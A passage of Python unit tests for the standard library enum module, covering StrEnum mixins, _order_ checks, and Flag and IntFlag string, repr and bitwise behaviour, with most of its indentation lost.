class CaseInsensitiveStrEnum(str, Enum):
@classmethod
def _missing_(cls, value):
for member in cls._member_map_.values():
if member._value_.lower() == value.lower():
return member
return super()._missing_(value)
#
class LenientStrEnum(str, Enum):
def __init__(self, *args):
self._valid = True
@classmethod
def _missing_(cls, value):
unknown = cls._member_type_.__new__(cls, value)
unknown._valid = False
unknown._name_ = value.upper()
unknown._value_ = value
cls._member_map_[value] = unknown
return unknown
@property
def valid(self):
return self._valid
#
class JobStatus(CaseInsensitiveStrEnum, LenientStrEnum):
ACTIVE = "active"
PENDING = "pending"
TERMINATED = "terminated"
#
JS = JobStatus
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
missing = JS('missing')
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
self.assertTrue(isinstance(missing, JS))
self.assertFalse(missing.valid)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual('{}'.format(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
self.assertEqual(repr(GoodStrEnum.one), 'GoodStrEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
                print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_custom_strenum_with_warning(self):
class CustomStrEnum(str, Enum):
pass
class OkayEnum(CustomStrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(OkayEnum.one, '1')
self.assertEqual(str(OkayEnum.one), 'one')
with self.assertWarns(DeprecationWarning):
self.assertEqual('{}'.format(OkayEnum.one), '1')
self.assertEqual(OkayEnum.one, '{}'.format(OkayEnum.one))
self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, CustomStrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, CustomStrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(str(HelloEnum.eight), 'eight')
#
class GoodbyeMixin:
def goodbye(self):
                print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(str(GoodbyeEnum.nine), 'nine')
#
class FirstFailedStrEnum(CustomStrEnum):
one = 1 # this will become '1'
two = '2'
class SecondFailedStrEnum(CustomStrEnum):
one = '1'
two = 2, # this will become '2'
three = '3'
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = 2 # this will become '2'
with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', 'ascii', 9
@unittest.skipIf(
python_version < (3, 12),
'mixin-format currently uses member.value',
)
def test_custom_strenum(self):
class CustomStrEnum(str, Enum):
pass
class OkayEnum(CustomStrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(OkayEnum.one, '1')
self.assertEqual(str(OkayEnum.one), 'one')
self.assertEqual('{}'.format(OkayEnum.one), 'one')
self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, CustomStrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, CustomStrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(str(HelloEnum.eight), 'eight')
#
class GoodbyeMixin:
def goodbye(self):
                print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(str(GoodbyeEnum.nine), 'nine')
#
class FirstFailedStrEnum(CustomStrEnum):
one = 1 # this will become '1'
two = '2'
class SecondFailedStrEnum(CustomStrEnum):
one = '1'
two = 2, # this will become '2'
three = '3'
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = 2 # this will become '2'
with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_missing_value_error(self):
with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"):
class Combined(str, Enum):
#
def __new__(cls, value, sequence):
enum = str.__new__(cls, value)
if '(' in value:
fis_name, segment = value.split('(', 1)
segment = segment.strip(' )')
else:
fis_name = value
segment = None
enum.fis_name = fis_name
enum.segment = segment
enum.sequence = sequence
return enum
#
def __repr__(self):
return "<%s.%s>" % (self.__class__.__name__, self._name_)
#
key_type = 'An$(1,2)', 0
company_id = 'An$(3,2)', 1
code = 'An$(5,1)', 2
description = 'Bn$', 3
@unittest.skipUnless(
python_version == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
@unittest.skipUnless(
python_version < (3, 12),
'member-member access now raises an exception',
)
def test_warning_for_member_from_member_access(self):
with self.assertWarns(DeprecationWarning):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
self.assertIs(Di.NO, nope)
@unittest.skipUnless(
python_version >= (3, 12),
'member-member access currently issues a warning',
)
def test_exception_for_member_from_member_access(self):
with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
def test_strenum_auto(self):
class Strings(StrEnum):
ONE = auto()
TWO = auto()
self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two'])
def test_dynamic_members_with_static_methods(self):
#
foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'}
class Foo(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
})
def upper(self):
return self.value.upper()
self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE])
self.assertEqual(Foo.FOO_CAT.value, 'aloof')
self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG')
#
with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"):
class FooBar(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
},
**{'FOO_CAT': 'small'},
)
def upper(self):
return self.value.upper()
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(Perm(~0)), 'R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_boundary(self):
self.assertIs(enum.Flag._boundary_, STRICT)
class Iron(Flag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(Flag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(Flag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(Flag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
    def test_programmatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
    def test_programmatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
    def test_programmatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
    def test_programmatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
    def test_programmatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'BLACK' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RO' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Open
@unittest.skipIf(
python_version < (3, 12),
        '__contains__ only works with enum members before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
self.assertFalse('BLACK' in Color)
self.assertFalse('RO' in Open)
self.assertTrue(1 in Color)
self.assertTrue(1 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_number_reset_and_order_cleanup(self):
class Confused(Flag):
_order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN'
ONE = auto()
TWO = auto()
FOUR = auto()
DOS = 2
EIGHT = auto()
SIXTEEN = auto()
self.assertEqual(
list(Confused),
[Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN])
self.assertIs(Confused.TWO, Confused.DOS)
self.assertEqual(Confused.DOS._value_, 2)
self.assertEqual(Confused.EIGHT._value_, 8)
self.assertEqual(Confused.SIXTEEN._value_, 16)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
        # check that the racing threads created each composite member only once
        # (248 composite + 8 canonical = 256 distinct objects)
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
class Skip(IntFlag):
FIRST = 1
SECOND = 2
EIGHTH = 8
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm.R | 8), '12')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(Perm(8)), '8')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(~(Perm.R | 8)), '-13')
self.assertEqual(str(Perm(~0)), 'R|W|X')
self.assertEqual(str(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(Open(4)), '4')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
self.assertEqual(str(Open(~4)), '-5')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm.R | 8), '12')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(Perm(8)), '8')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
